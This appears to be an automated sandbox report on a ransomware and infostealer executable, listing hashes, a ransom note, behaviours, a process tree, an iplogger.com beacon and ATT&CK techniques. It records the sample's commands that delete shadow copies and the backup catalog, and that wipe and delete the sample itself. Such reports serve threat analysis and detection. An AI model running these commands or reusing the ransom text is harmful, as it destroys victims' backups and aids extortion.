Overview

overview

10

Static

static

10

55c30024ae...15.exe

windows7-x64

10

55c30024ae...15.exe

windows7-x64

10

55c30024ae...15.exe

windows10-2004-x64

10

55c30024ae...15.exe

windows10-ltsc_2021-x64

10

55c30024ae...15.exe

windows11-21h2-x64

10

56f7b48f38...59.exe

windows10-2004-x64

10

56f7b48f38...59.exe

windows7-x64

10

56f7b48f38...59.exe

windows10-2004-x64

10

56f7b48f38...59.exe

windows10-ltsc_2021-x64

10

56f7b48f38...59.exe

windows11-21h2-x64

10

5a96b92938...a4.exe

windows11-21h2-x64

10

5a96b92938...a4.exe

windows7-x64

10

5a96b92938...a4.exe

windows10-2004-x64

10

5a96b92938...a4.exe

windows10-ltsc_2021-x64

10

5a96b92938...a4.exe

windows11-21h2-x64

10

606b88fce1...c4.exe

windows10-2004-x64

3

606b88fce1...c4.exe

windows7-x64

1

606b88fce1...c4.exe

windows10-2004-x64

3

606b88fce1...c4.exe

windows10-ltsc_2021-x64

3

606b88fce1...c4.exe

windows11-21h2-x64

3

6bda9faf71...4b.exe

windows11-21h2-x64

10

6bda9faf71...4b.exe

windows7-x64

10

6bda9faf71...4b.exe

windows10-2004-x64

10

6bda9faf71...4b.exe

windows10-ltsc_2021-x64

10

6bda9faf71...4b.exe

windows11-21h2-x64

10

71b46e95fb...a8.exe

windows11-21h2-x64

10

71b46e95fb...a8.exe

windows7-x64

10

71b46e95fb...a8.exe

windows10-2004-x64

10

71b46e95fb...a8.exe

windows10-ltsc_2021-x64

10

71b46e95fb...a8.exe

windows11-21h2-x64

10

Resubmissions

25/03/2025, 13:12 UTC

250325-qfl42aznw9 10

25/03/2025, 13:09 UTC

250325-qdtq4aznv6 10

25/03/2025, 13:05 UTC

250325-qbtcjszns3 10

25/03/2025, 13:01 UTC

250325-p9k86awxat 10

25/03/2025, 12:55 UTC

250325-p58tnawwe1 10

25/03/2025, 12:51 UTC

250325-p3txqazmt6 10

05/02/2025, 11:16 UTC

250205-ndjvsavrdm 10

16/07/2024, 08:54 UTC

240716-kt64gavakp 10

Analysis

  • max time kernel
    99s
  • max time network
    104s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25/03/2025, 13:01 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe

  • Size

    42KB

  • MD5

    abb04a0418be9cc4618f393d7fc9d76b

  • SHA1

    dbe3b07ab1383e4d693bb6cab17ad8a7c1c5cd7b

  • SHA256

    56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659

  • SHA512

    f7bce71f01ffae675a8b8a23a8f2e4d162ccefc349beadb84ffcca890dc68ed636acf4f7d694145c779125078f6634f30aed5f5651ee6c12dc4768f7c0a0f47b

  • SSDEEP

    768:QO1oR/8VS1RzK4wbs+D/SIJX+ZZ1SQQwZuIOPzDsHw67ZY23IWSjNV:QgS1FKnDtkuImsHw6V73ejNV

Score
10/10
defense_evasiondiscoveryexecutionimpactransomwarespywarestealer

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt

Ransom Note
::: Greetings ::: Little FAQ: .1. Q: Whats Happen? A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen. .2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay us. .3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee. .4. Q: How to contact with you? A: You can write us to our mailbox: ardellchadwick275@msgsafe.io .5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files. .6. Q: If I don�t want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money. :::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.
Emails

ardellchadwick275@msgsafe.io

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Renames multiple (8309) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
    "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
      "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe" n2132
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2292
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:2984
      • C:\Windows\system32\wbadmin.exe
        wbadmin delete catalog -quiet
        3⤵
        • Deletes backup catalog
        PID:2832
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2644
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ping 1.1.1.1 -n 5 & fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe" & del /q /f "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:2044
      • C:\Windows\SysWOW64\PING.EXE
        ping 1.1.1.1 -n 5
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:2388
      • C:\Windows\SysWOW64\fsutil.exe
        fsutil file setZeroData offset=0 length=131072 "C:\Users\Admin\AppData\Local\Temp\56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1772
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2768
  • C:\Windows\system32\wbengine.exe
    "C:\Windows\system32\wbengine.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2748
  • C:\Windows\System32\vdsldr.exe
    C:\Windows\System32\vdsldr.exe -Embedding
    1⤵
      PID:3036
    • C:\Windows\System32\vds.exe
      C:\Windows\System32\vds.exe
      1⤵
        PID:2756
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
          PID:1088

        Network

        • flag-us
          DNS
          iplogger.com
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          Remote address:
          8.8.8.8:53
          Request
          iplogger.com
          IN A
          Response
          iplogger.com
          IN A
          104.21.76.57
          iplogger.com
          IN A
          172.67.188.178
        • flag-us
          GET
          https://iplogger.com/1QhhX4
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          Remote address:
          104.21.76.57:443
          Request
          GET /1QhhX4 HTTP/1.1
          Referer: 74B92775;2.22
          Host: iplogger.com
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Date: Tue, 25 Mar 2025 13:04:15 GMT
          Content-Type: image/png
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: 443237163563470739=1; expires=Wed, 25 Mar 2026 13:04:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
          Set-Cookie: clhf03028ja=212.102.63.147; expires=Wed, 25 Mar 2026 13:04:15 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
          memory: 0.41068267822265625
          expires: Tue, 25 Mar 2025 13:04:15 +0000
          Cache-Control: no-store, no-cache, must-revalidate
          strict-transport-security: max-age=604800
          strict-transport-security: max-age=31536000
          content-security-policy: img-src https: data:; upgrade-insecure-requests
          x-frame-options: SAMEORIGIN
          cf-cache-status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvMZ8sf8%2Fg%2FggSbvhnGSLS3p6CMh0vksF%2FA0BhByDmKj3txb%2Fb4WNIkFSNr82yq13vDkQBD9ok94gv7newK4GrXH3fxwgW6096s9xpL6osOpgIkNDfX8VWGkGVUR8wM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 925e9cf11db2bec9-LHR
          alt-svc: h3=":443"; ma=86400
          server-timing: cfL4;desc="?proto=TCP&rtt=46417&min_rtt=21362&rtt_var=54240&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3133&recv_bytes=411&delivery_rate=152334&cwnd=253&unsent_bytes=0&cid=167ad39131ee6508&ts=356&x=0"
        • flag-us
          DNS
          c.pki.goog
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          Remote address:
          8.8.8.8:53
          Request
          c.pki.goog
          IN A
          Response
          c.pki.goog
          IN CNAME
          pki-goog.l.google.com
          pki-goog.l.google.com
          IN A
          142.250.179.227
        • flag-gb
          GET
          http://c.pki.goog/r/gsr1.crl
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          Remote address:
          142.250.179.227:80
          Request
          GET /r/gsr1.crl HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Microsoft-CryptoAPI/6.1
          Host: c.pki.goog
          Response
          HTTP/1.1 200 OK
          Accept-Ranges: bytes
          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
          Cross-Origin-Resource-Policy: cross-origin
          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
          Content-Length: 1739
          X-Content-Type-Options: nosniff
          Server: sffe
          X-XSS-Protection: 0
          Date: Tue, 25 Mar 2025 12:31:21 GMT
          Expires: Tue, 25 Mar 2025 13:21:21 GMT
          Cache-Control: public, max-age=3000
          Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
          Content-Type: application/pkix-crl
          Vary: Accept-Encoding
          Age: 1974
        • flag-gb
          GET
          http://c.pki.goog/r/r4.crl
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          Remote address:
          142.250.179.227:80
          Request
          GET /r/r4.crl HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Microsoft-CryptoAPI/6.1
          Host: c.pki.goog
          Response
          HTTP/1.1 200 OK
          Accept-Ranges: bytes
          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
          Cross-Origin-Resource-Policy: cross-origin
          Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
          Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
          Content-Length: 436
          X-Content-Type-Options: nosniff
          Server: sffe
          X-XSS-Protection: 0
          Date: Tue, 25 Mar 2025 12:19:56 GMT
          Expires: Tue, 25 Mar 2025 13:09:56 GMT
          Cache-Control: public, max-age=3000
          Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
          Content-Type: application/pkix-crl
          Vary: Accept-Encoding
          Age: 2659
        • 104.21.76.57:443
          https://iplogger.com/1QhhX4
          tls, http
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          859 B
           5.2kB
           10
          11

          HTTP Request

          GET https://iplogger.com/1QhhX4

          HTTP Response

          200
        • 142.250.179.227:80
          http://c.pki.goog/r/r4.crl
          http
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          600 B
           5.0kB
           8
          6

          HTTP Request

          GET http://c.pki.goog/r/gsr1.crl

          HTTP Response

          200

          HTTP Request

          GET http://c.pki.goog/r/r4.crl

          HTTP Response

          200
        • 8.8.8.8:53
          iplogger.com
          dns
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          58 B
           90 B
           1
          1

          DNS Request

          iplogger.com

          DNS Response

          104.21.76.57
          172.67.188.178

        • 8.8.8.8:53
          c.pki.goog
          dns
          56f7b48f3877743c44aef0f3e990b3387dd6185f1c40a7477f5b6bad64960659.exe
          56 B
           107 B
           1
          1

          DNS Request

          c.pki.goog

          DNS Response

          142.250.179.227

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        Windows Management Instrumentation

        1
        T1047

        Persistence

        Privilege Escalation

        Defense Evasion

        Direct Volume Access

        1
        T1006

        Indicator Removal

        3
        T1070

        File Deletion

        3
        T1070.004

        Modify Registry

        1
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        1
        T1552

        Credentials In Files

        1
        T1552.001

        Discovery

        Query Registry

        1
        T1012

        Remote System Discovery

        1
        T1018

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        System Network Configuration Discovery

        1
        T1016

        Internet Connection Discovery

        1
        T1016.001

        Lateral Movement

        Collection

        Data from Local System

        1
        T1005

        Command and Control

        Web Service

        1
        T1102

        Exfiltration

        Impact

        Defacement

        1
        T1491

        Inhibit System Recovery

        3
        T1490

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\+README-WARNING+.txt
          Filesize

          1KB

          MD5

          29abe2cf61968275a38bcf735c875d5d

          SHA1

          4386674a153df8a4a1dc81bcf976ffae29299b2f

          SHA256

          463c885a5b5cf4b8447e11fddf5b2028c8adf0974f6bb3178454bf26bb3082e6

          SHA512

          261193ffe16866ed90f20ef293876c619393ce7e29a75cfba87badd2f34f2bed8338728a0a0ce505b6817adab04e9e22826cdd42f7917b434c1b978f07dc5871

          Download Submit

        We care about your privacy.

        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.